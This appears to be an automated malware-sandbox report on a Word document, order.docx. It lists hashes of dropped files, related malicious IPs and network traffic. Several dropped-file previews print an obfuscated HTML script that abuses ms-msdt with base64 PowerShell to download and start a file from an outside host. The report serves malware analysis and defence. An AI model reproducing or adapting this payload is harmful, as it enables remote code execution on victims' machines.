            SecuriteInfo.com.Trojan.DownloaderNET.252.9711.exeGet hashmaliciousBrowse
            • 91.235.116.231
            new order 7634839.exeGet hashmaliciousBrowse
            • 91.235.116.231
            INV39765.exeGet hashmaliciousBrowse
            • 91.235.116.232
            KEie4St7TtGet hashmaliciousBrowse
            • 84.234.97.216
            Linux_x86Get hashmaliciousBrowse
            • 84.234.97.216
            INV39765.exeGet hashmaliciousBrowse
            • 91.235.116.232
            triage_dropped_file.exeGet hashmaliciousBrowse
            • 91.235.116.232
            GBEYBE.docGet hashmaliciousBrowse
            • 91.235.116.232
            https://superradio.mk/wp-includes/images/wlw/cs/Get hashmaliciousBrowse
            • 193.29.187.92
            IMG2_518876978.vbsGet hashmaliciousBrowse
            • 91.235.116.180
            JZPQxfeXEQGet hashmaliciousBrowse
            • 84.234.107.8
            ITEMS 222940.exeGet hashmaliciousBrowse
            • 91.235.116.180
            #Ud83d#Udce0TetratecheFaxNOV03 xti.htmGet hashmaliciousBrowse
            • 193.201.82.252
            MashreqeFaxNOV03 xti.htmGet hashmaliciousBrowse
            • 193.201.82.252
            Wire_Notification_Preview08645.htmGet hashmaliciousBrowse
            • 91.235.116.180
            No context
            No context
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.28806523107588966
            Encrypted:false
            SSDEEP:48:I35TRB9NE4co0pOXJL2lgH2SEAFdGJhLeo7dgThb87lrTArRmLRm/H:K5TLchZGJSlnfSdchmtw7pEH
            MD5:69E01CD5678E2F435A5DA3DD7098792D
            SHA1:CD9B07B23BC125CA6AA49FA9ABF57D19D475F488
            SHA-256:4891EF6EBC9EFA8EE67F0B6A02B2C3D4C76D13AF8B23DA56FC5F82F94325EA8D
            SHA-512:FDFB7DC1C79983438B5F5162AA1DAB10B28A6FF4F3D24B1F8E85C0275C449305D8DDF6FA75710CB8E9AA1C3E0FEFE6EB32579782B1E75B7D91A9426102D6A158
            Malicious:false
            Reputation:low
            Preview:......M.eFy...z...S.!.F.L.O...S,...X.F...Fa.q................................?.C.l.+..Y}........5..K.I.T.....i.A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.6680333186685128
            Encrypted:false
            SSDEEP:96:KxaCyc4zzRrdrhr1elVrf7oGzx54HU0HU5LLs1BQM8rDdTM8rDk9rrFF9rrF:jc45Np1eXMGzDU78LsHQ7tT7sFHF
            MD5:0F9367D91948664C4F0693A5B2D1F022
            SHA1:87640D1AE4FF977D2262FB54BFC5B84DB76EDFB2
            SHA-256:F5B4FDE36B3E368EE7C6E745D715BE2658F830B88C6F411D82C3E16B0BC713B6
            SHA-512:FEB40E2A419901F30C4FB9EBDEF7713D947AE18421D5B97270DF5B067F42D0D3EAEFFEE6620DB83B5BADA053367C5960F767E71A021140A47723607FCF440318
            Malicious:false
            Reputation:low
            Preview:......M.eFy...z./Hx...O.R..@...S,...X.F...Fa.q.............................#.JA..@....K.L...............G....#..2.S...................................W...............................x...x...x...x..*............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.....5.2A....................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):114
            Entropy (8bit):3.9684196678119985
            Encrypted:false
            SSDEEP:3:yVlgsRlzolVJIyrnWWDhPN3IlkNlZZglc9NCR5l276:yPblzolUW1T4+wlc9ot22
            MD5:B3F9E95F032199D9FFC42A0D17DB4430
            SHA1:3B883B7D1150D9832CBC819C1852D96B2FD6FF21
            SHA-256:9A45C47B86B253B8AF932AF843250F11E722706F79CDDB7D103971C08E4F8C29
            SHA-512:773C82C9CB1E761B3051473129F93AC19DE9BD4E8C9F437176BEC12D308CF27A5E6260A6D47E5E3F2609C9BBC7A0B625D72EE29C781275A335CA996066F6B2A7
            Malicious:false
            Reputation:low
            Preview:..H..@....b..q....]F.S.D.-.{.B.D.A.0.6.7.B.C.-.A.8.5.F.-.4.D.0.9.-.B.1.E.2.-.A.2.7.A.2.6.2.5.9.E.7.2.}...F.S.D..
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.2879180121063263
            Encrypted:false
            SSDEEP:48:I3sRBLontTzybGrn7ndxYyK2cw/SgR5ErBQqeQqNH:KsLMnJzybyn7nrYy3DUBQ5Q+H
            MD5:12C0319349817D1200BD72928EFF5130
            SHA1:2659A8308AC1006515BFDF4D53B14C9F69F7E102
            SHA-256:9C3F839DC9BE9306C246846AFE3ADBBABB4A4D91210176C0B00AC7D7CBAB88D3
            SHA-512:D00FE147BB8D3089B1927875019FA13F5401C62FA82A33821E22AE94DDF8CB7273365748558184B0BF12FEFAC93D2B089BD9B14BDFE5C4CFAA33928D0FB26BE3
            Malicious:false
            Reputation:low
            Preview:......M.eFy...z.......E.....qi.S,...X.F...Fa.q.............................K.$..9N..5.S..|............h..G..vRq*...A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.22123534710596615
            Encrypted:false
            SSDEEP:48:I3fZUrBKp51f1h0gL1U0/k1t81Z1tubFpZ+18Z+11:KfZCKp51f1z1jk1W1Z1t0o18o11
            MD5:05B01089293DF5BB27FED11ECA430E6F
            SHA1:92D1D51F3A1262A740E2239D66759BD14F5583DB
            SHA-256:8DFBEF5045064D09CC51B199192171E1B147A5404F9EA799B4260F960E56AAC7
            SHA-512:48EE074EA044A608B5BEF00AF6B72A5865E58F133C16C3FFCEB35D568B7332F49052689340204F119666B15B17F0DB3C4794C3C026CA13F5E1955F13B78B1677
            Malicious:false
            Reputation:low
            Preview:......M.eFy...zxM.I.70E....Ua.ZS,...X.F...Fa.q.............................{.....A..N...s..............J........P>..................................PB...............................x...x...x...x..........+....................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G...|.u-.u.A...W"U.............................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):114
            Entropy (8bit):3.9574976283572916
            Encrypted:false
            SSDEEP:3:yVlgsRlz4jlG9KSlhmSLlYnPkRIlPSNr7ljtlWglIRZ276:yPblzqhSaS6nPkRIdSPpYglIf22
            MD5:47E62973D3D4A696C9CB8D121EC7DDAA
            SHA1:43F1A500741C399A6ADC55BC1013BB0F917F2F20
            SHA-256:209521C1D97FEA95A89C0C09038668F492955E29CDB45180C891D78B86782AB9
            SHA-512:DA70307E906E96DFD37DAF5201FB02B6F9CAFE8D4E9455B4FF98DE61E43861C0CB244578AA768ED238DA95CEDBD8A1FEC016F8AD8F4FA2018B20602BD9E435F4
            Malicious:false
            Reputation:low
            Preview:..H..@....b..q....]F.S.D.-.{.8.7.F.A.B.0.B.5.-.C.E.0.C.-.4.4.8.4.-.8.0.A.4.-.0.7.2.1.7.6.0.F.3.A.7.E.}...F.S.D..
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
            Category:downloaded
            Size (bytes):12744
            Entropy (8bit):6.075581200829705
            Encrypted:false
            SSDEEP:192:NUUW7GUpDmLryJoAf719cD6wIFfRIbTO96KEbHGQ78/7GyUxV4eDQnHGD:NECQ4yJPDcD6c2NE3G7GyUxV33D
            MD5:2E15CCD20E7E02ED1F80CB3557FA4E89
            SHA1:B7C97A67705C420A5246E9C9BB39720B4E1B5FC0
            SHA-256:78FA2ECFD68C8F56EE2BDDD806C0C68FAECA91299C681856EC3AAE59EC9692A0
            SHA-512:FD2B42562A8188ACE73FD25E8752B8A394E2FDD901834826588ABF062B3D5A28AFE57CB41B467A2814B4D95E1308200BED2714F56E69A2D919060B2B4A540A81
            Malicious:false
            Reputation:low
            IE Cache URL:http://polpharmar.com/test.html
            Preview:<!dOcTypE HTml>....<HTmL>....<boDY>....<SCrIpT typE="text/JScript">........location.href = "m" + "s-msdt:/" + "ID" + " " + "PcwdiAgnOSTi" + "C" + " " + "-sKi" + "P" + " " + "for" + "C" + "e" + " " + "-pArA" + "m" + " " + "\"" + "IT_ReBRowseforfiL" + "E" + "=" + "#Ja2Y" + " " + "IT_LaunchMethod=Context" + "Menu" + " " + "IT_BrowseForFi" + "l" + "e=" + "W5A$(" + "Iex($(IeX('[sYSTem.teXt.enCODinG]'+[cHar]58+[chAR]58+'uTf8.geTStRiNg([sYStem.CoNVErT]'+[char]58+" + "[char]0x3A+'fRombASe64StRINg('+[CHar]0X22+'U1RPcC1Qck9jZXNTIC1mb1JjZSAtTmFNZSAnbXNkdCc7JEtZID0gYWRkLXRZUEUgLW1lbUJlcmRFRmluaVRJT04gJ1tEbGxJbXBvcnQoIlVSbG1vTi5EbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIFIsc3RyaW5nIGJpTCxzdHJpbmcgdXdlLHVpbnQgUm5vLEludFB0ciB1Ryk7JyAtbkFtRSAiWXZRIiAtTkF" + "tRVNQYUNlIEhLZyAtUGFzc1RocnU7ICRLWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovL3BvbHBoYXJtYXIuY29tL3Rlc3QuaW5mIiwiJGVudjpBUFBEQVRBXHRlc3QuaW5mIiwwLDApO1NUYXJ0L
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 2453x3509, frames 3
            Category:dropped
            Size (bytes):428988
            Entropy (8bit):7.450719655008162
            Encrypted:false
            SSDEEP:12288:hMx4+OsFSHQoWeN/aj0k6GgqPbTwlc08ZJ:hMmWeN/XegqPb7J
            MD5:E8C7DD6A2DED0B1A7C8F5C15FE284802
            SHA1:B93D9DC1405EE585DEC160FD0B0E7F2AF0D269A0
            SHA-256:82C2564BFE32D9FCA3B4919AD2FAA4AD8DFCBEC0DD7A1C50C7B1228DD6FF2AB4
            SHA-512:6100C0A1C357E6B05AFE3367B9CA5425C2FE81393E35B1297F9D7AFC5F1F07832B9CD0C26E9142A3BEE6086C6201BE2F2F4345A09044A8DBA49EEAF91B882FEF
            Malicious:false
            Reputation:low
            Preview:......JFIF.....,.,.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
            Category:dropped
            Size (bytes):12744
            Entropy (8bit):6.075581200829705
            Encrypted:false
            SSDEEP:192:NUUW7GUpDmLryJoAf719cD6wIFfRIbTO96KEbHGQ78/7GyUxV4eDQnHGD:NECQ4yJPDcD6c2NE3G7GyUxV33D
            MD5:2E15CCD20E7E02ED1F80CB3557FA4E89
            SHA1:B7C97A67705C420A5246E9C9BB39720B4E1B5FC0
            SHA-256:78FA2ECFD68C8F56EE2BDDD806C0C68FAECA91299C681856EC3AAE59EC9692A0
            SHA-512:FD2B42562A8188ACE73FD25E8752B8A394E2FDD901834826588ABF062B3D5A28AFE57CB41B467A2814B4D95E1308200BED2714F56E69A2D919060B2B4A540A81
            Malicious:false
            Reputation:low
            Preview:<!dOcTypE HTml>....<HTmL>....<boDY>....<SCrIpT typE="text/JScript">........location.href = "m" + "s-msdt:/" + "ID" + " " + "PcwdiAgnOSTi" + "C" + " " + "-sKi" + "P" + " " + "for" + "C" + "e" + " " + "-pArA" + "m" + " " + "\"" + "IT_ReBRowseforfiL" + "E" + "=" + "#Ja2Y" + " " + "IT_LaunchMethod=Context" + "Menu" + " " + "IT_BrowseForFi" + "l" + "e=" + "W5A$(" + "Iex($(IeX('[sYSTem.teXt.enCODinG]'+[cHar]58+[chAR]58+'uTf8.geTStRiNg([sYStem.CoNVErT]'+[char]58+" + "[char]0x3A+'fRombASe64StRINg('+[CHar]0X22+'U1RPcC1Qck9jZXNTIC1mb1JjZSAtTmFNZSAnbXNkdCc7JEtZID0gYWRkLXRZUEUgLW1lbUJlcmRFRmluaVRJT04gJ1tEbGxJbXBvcnQoIlVSbG1vTi5EbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIFIsc3RyaW5nIGJpTCxzdHJpbmcgdXdlLHVpbnQgUm5vLEludFB0ciB1Ryk7JyAtbkFtRSAiWXZRIiAtTkF" + "tRVNQYUNlIEhLZyAtUGFzc1RocnU7ICRLWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovL3BvbHBoYXJtYXIuY29tL3Rlc3QuaW5mIiwiJGVudjpBUFBEQVRBXHRlc3QuaW5mIiwwLDApO1NUYXJ0L
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
            Category:dropped
            Size (bytes):12744
            Entropy (8bit):6.075581200829705
            Encrypted:false
            SSDEEP:192:NUUW7GUpDmLryJoAf719cD6wIFfRIbTO96KEbHGQ78/7GyUxV4eDQnHGD:NECQ4yJPDcD6c2NE3G7GyUxV33D
            MD5:2E15CCD20E7E02ED1F80CB3557FA4E89
            SHA1:B7C97A67705C420A5246E9C9BB39720B4E1B5FC0
            SHA-256:78FA2ECFD68C8F56EE2BDDD806C0C68FAECA91299C681856EC3AAE59EC9692A0
            SHA-512:FD2B42562A8188ACE73FD25E8752B8A394E2FDD901834826588ABF062B3D5A28AFE57CB41B467A2814B4D95E1308200BED2714F56E69A2D919060B2B4A540A81
            Malicious:false
            Reputation:low
            Preview:<!dOcTypE HTml>....<HTmL>....<boDY>....<SCrIpT typE="text/JScript">........location.href = "m" + "s-msdt:/" + "ID" + " " + "PcwdiAgnOSTi" + "C" + " " + "-sKi" + "P" + " " + "for" + "C" + "e" + " " + "-pArA" + "m" + " " + "\"" + "IT_ReBRowseforfiL" + "E" + "=" + "#Ja2Y" + " " + "IT_LaunchMethod=Context" + "Menu" + " " + "IT_BrowseForFi" + "l" + "e=" + "W5A$(" + "Iex($(IeX('[sYSTem.teXt.enCODinG]'+[cHar]58+[chAR]58+'uTf8.geTStRiNg([sYStem.CoNVErT]'+[char]58+" + "[char]0x3A+'fRombASe64StRINg('+[CHar]0X22+'U1RPcC1Qck9jZXNTIC1mb1JjZSAtTmFNZSAnbXNkdCc7JEtZID0gYWRkLXRZUEUgLW1lbUJlcmRFRmluaVRJT04gJ1tEbGxJbXBvcnQoIlVSbG1vTi5EbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIFIsc3RyaW5nIGJpTCxzdHJpbmcgdXdlLHVpbnQgUm5vLEludFB0ciB1Ryk7JyAtbkFtRSAiWXZRIiAtTkF" + "tRVNQYUNlIEhLZyAtUGFzc1RocnU7ICRLWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovL3BvbHBoYXJtYXIuY29tL3Rlc3QuaW5mIiwiJGVudjpBUFBEQVRBXHRlc3QuaW5mIiwwLDApO1NUYXJ0L
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:Composite Document File V2 Document, Cannot read section info
            Category:dropped
            Size (bytes):4608
            Entropy (8bit):1.9630438652210782
            Encrypted:false
            SSDEEP:12:rl3bn+HFADYWtaoa5sQ2p0hCXhlSRmCRncKvjMKvqrCJo0nKvqFn7i1X4CIX4X4h:rbR6Op0rRjRcSgSTSWio4VR
            MD5:D164864528BA69AE924554E4638BA1A6
            SHA1:7257FD1CC0A67FCEBAB6E078533460C45AAF3BBA
            SHA-256:36072BAE47AEB89D82C4E9AEAC305591853FB3B5FB5F328B41429E1AD583743E
            SHA-512:A204231FB6CAC172B2B3CBBAA2D27245B150300D601E948A4A556A560C6FBC2B00295EED81CA8F443285ABFDA149BD780FDA65E80B4DD6EAB2F82D8B38740728
            Malicious:false
            Reputation:low
            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):1024
            Entropy (8bit):0.05390218305374581
            Encrypted:false
            SSDEEP:3:ol3lYdn:4Wn
            MD5:5D4D94EE7E06BBB0AF9584119797B23A
            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
            Malicious:false
            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:dBase III DBT, version number 0, next free block index 5177357
            Category:dropped
            Size (bytes):2888
            Entropy (8bit):2.4712779761264723
            Encrypted:false
            SSDEEP:24:yFChNWhYG5laEUSsSkS90J+RTskGsAwMKinefAtHDlMsGf2KvBS4OxM:yEXWhh7CSsSkF7kPn/inOA7PJIg4O2
            MD5:FE62A27FE716EDD8CA556BD4BD4936B3
            SHA1:F16D68DCF3F5B66BC8632362A5582EC266403AA6
            SHA-256:50EF0BFE8FAD94DF14E78769F0DD6259B960DB21348B6BBD5B5A66D94B8968DE
            SHA-512:55BA43A5A2811C5A421BCC154B4687D9D002B8F6D86357DB26C9725928F032B9742B52910F292FFFCDFC56FF9862497BF7BB26B19CE7613EC22BE6FFB298FFDA
            Malicious:false
            Preview:..O.O. .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................,.......>...p...............V...........................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.025534580459190742
            Encrypted:false
            SSDEEP:6:I3DPc0hV42J9vxggLRCg/gEQtRXv//4tfnRujlw//+GtluJ/eRuj:I3DPpH/glvYg3J/
            MD5:019F974878CAE2B3FC1E26BD4B84F84D
            SHA1:24025E2DDB9FB1A00CC767A59E5965DC7FDAB99A
            SHA-256:543C4D8F2C76D81913B99D569286D61D0FB1538EE499019BB6B8A3C1564F35D2
            SHA-512:670AAA166C8D0E5EA133CB9E850291D0F263D4DC0A07961A300EE561D10C970181D558D61BD6D35A85CC2ED451B464A5FB4170F02F1CE6D09B8BB4EFA38D98C9
            Malicious:false
            Preview:......M.eFy...z.......E.....qi.S,...X.F...Fa.q.............................."b4rN..2+.66Z............h..G..vRq*.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.02561327614152181
            Encrypted:false
            SSDEEP:6:I3DPcO7mRvxggLRtuGBTw2RXv//4tfnRujlw//+GtluJ/eRuj:I3DPNCQ40evYg3J/
            MD5:7C0D380D75B07C76F90A64BC0C0BB4C4
            SHA1:97263771B651F3607BA16EE1091E4E0470D0D0A1
            SHA-256:637759E0BB88213E39C092E9150B36626FD34A2D81D3C11301EDA229B0EB6C75
            SHA-512:355EC0BFB45F9D4D1E46A179A1FF2C46327EBA12B69109D331B8818A8CC65D0532FE2AC70120C7C430AB0C350E96A645504F292907A427E247EFD345388E4A84
            Malicious:false
            Preview:......M.eFy...z...S.!.F.L.O...S,...X.F...Fa.q............................:.....aK..\|`..Q........5..K.I.T.....i.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):62
            Entropy (8bit):4.385929384302707
            Encrypted:false
            SSDEEP:3:bDuMJlSmNrFomxWBGrFov:bCYN5yG5y
            MD5:6E65A4A82201A6E784741E067206F0FF
            SHA1:D87C02C96364F566BC9D1BD0731EEABCB675D396
            SHA-256:0DD74BE8D4947A9D214C3996F2B1DAA7489CAEF559D564888A14252FB6F62C9E
            SHA-512:85154A06C9B0B429EDD011B6D971135C08DBE1AC3873AF3E61992980EB8573338D704D89BDE19C9527822A435CFDFDEE151574794E8F3A9EC48C626BABDD05BD
            Malicious:false
            Preview:[folders]..Templates.LNK=0..order.LNK=0..[misc]..order.LNK=0..
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:57 2022, mtime=Tue Mar 8 15:45:57 2022, atime=Mon Aug 1 16:49:19 2022, length=327439, window=hide
            Category:dropped
            Size (bytes):992
            Entropy (8bit):4.5589914149078465
            Encrypted:false
            SSDEEP:12:8x94II0gXg/XAlCPCHaXMBzB/nPyX+WeNGY5i+VicvbcHfZpzNDtZ3YilMMEpxRN:8x9Ik/XT89dqwQZ3eQH5Dv3qIu7D
            MD5:52F509E11A66BB60D5E215CECE2B2DDA
            SHA1:2936E51CCCE4FA3D3B96AD0A73A3601D4E1448CF
            SHA-256:A0890DE7166F147DDC6289D55DA4E1C2E549CAF2BB94AF5EFC13C6E8BE0DAEAF
            SHA-512:2CE4423374F89F3EFC652AD8D0459F2E4511DD20010B85155DDF3190F5C63E8026F8ED50941590C99AB6B1CDFFFD7C0D071A08EE8108A8EF6293ADA7AE20F97F
            Malicious:false
            Preview:L..................F.... ....(h..3...(h..3...8~.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT...Desktop.d......QK.XhT.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....\.2......U*. .ORDER~1.DOC.B......hT..hT..*...r.....'...............o.r.d.e.r...d.o.c.x.......t...............-...8...[............?J......C:\Users\..#...................\\936905\Users.user\Desktop\order.docx.!.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.o.r.d.e.r...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......936905..........D_....3N...W...9G..N..... .....[D_....3N...W...9G..N..... .....[....
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):162
            Entropy (8bit):2.503835550707525
            Encrypted:false
            SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
            MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
            SHA1:23684CCAA587C442181A92E722E15A685B2407B1
            SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
            SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
            Malicious:false
            Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:Little-endian UTF-16 Unicode text, with no line terminators
            Category:dropped
            Size (bytes):2
            Entropy (8bit):1.0
            Encrypted:false
            SSDEEP:3:Qn:Qn
            MD5:F3B25701FE362EC84616A93A45CE9998
            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
            Malicious:false
            Preview:..
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):162
            Entropy (8bit):2.503835550707525
            Encrypted:false
            SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
            MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
            SHA1:23684CCAA587C442181A92E722E15A685B2407B1
            SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
            SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
            Malicious:true
            Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
            File type:Microsoft Word 2007+
            Entropy (8bit):7.996855978259955
            TrID:
            • Word Microsoft Office Open XML Format document (49504/1) 49.01%
            • Word Microsoft Office Open XML Format document (43504/1) 43.07%
            • ZIP compressed archive (8000/1) 7.92%
            File name:order.docx
            File size:327439
            MD5:8abea2d6c14af54c6eac09d158554085
            SHA1:3802d9c8b3530fe7b140cbd4a12c3895c46077b2
            SHA256:aa26ed65b5b05b28fa8c56df8c0d87e6bfd8b98f962824293acce14d03cd3412
            SHA512:81bc9de694da797127ae09ac5a8e1d630981482e60343d870d6f106752af3bb2a9330852be728c2293a29c890f5d21b31ba820712a052fbc847d0fc06473050d
            SSDEEP:6144:khRfXb0GPobJUS8LOtB2x4FSTiSwQOV9Wojlv1CkMb02AxNw+w1m:khRfYGP+JUFOt9einQOKq/Mb0o1m
            TLSH:586423C4AAACFCC9E7DC2589E87343F871492954527C9B33E00274AC4DA7292EE77B10
            File Content Preview:PK.........g.T..'.d...T.......[Content_Types].xmlUT...S|.bS|.bS|.b...n.0.E......(1tQU..E.......=.n..m^..1..B)..l"%3....5..Z.l.>HkJ2(.$.........9.#Y.......l ....j8.8...M(.<FwOi.s.,....Je.f._}M.....z...RnM....<.h...[..=..s....${h...$.9%9.X.K#.(..P.r......6.
            Icon Hash:e4e6a2a2a4b4b4a4
            TimestampSource PortDest PortSource IPDest IP
            Aug 1, 2022 10:49:38.572686911 CEST4917180192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:38.621368885 CEST804917191.235.116.180192.168.2.22
            Aug 1, 2022 10:49:38.621476889 CEST4917180192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:38.621876955 CEST4917180192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:38.670455933 CEST804917191.235.116.180192.168.2.22
            Aug 1, 2022 10:49:38.674829960 CEST804917191.235.116.180192.168.2.22
            Aug 1, 2022 10:49:38.674990892 CEST4917180192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:43.679717064 CEST804917191.235.116.180192.168.2.22
            Aug 1, 2022 10:49:43.679815054 CEST4917180192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:44.537843943 CEST4917280192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:44.586576939 CEST804917291.235.116.180192.168.2.22
            Aug 1, 2022 10:49:44.586747885 CEST4917280192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:44.586869001 CEST4917280192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:44.635643005 CEST804917291.235.116.180192.168.2.22
            Aug 1, 2022 10:49:44.636255026 CEST804917291.235.116.180192.168.2.22
            Aug 1, 2022 10:49:44.846836090 CEST4917280192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:44.884654045 CEST804917291.235.116.180192.168.2.22
            Aug 1, 2022 10:49:44.884814978 CEST4917280192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:49.640113115 CEST804917291.235.116.180192.168.2.22
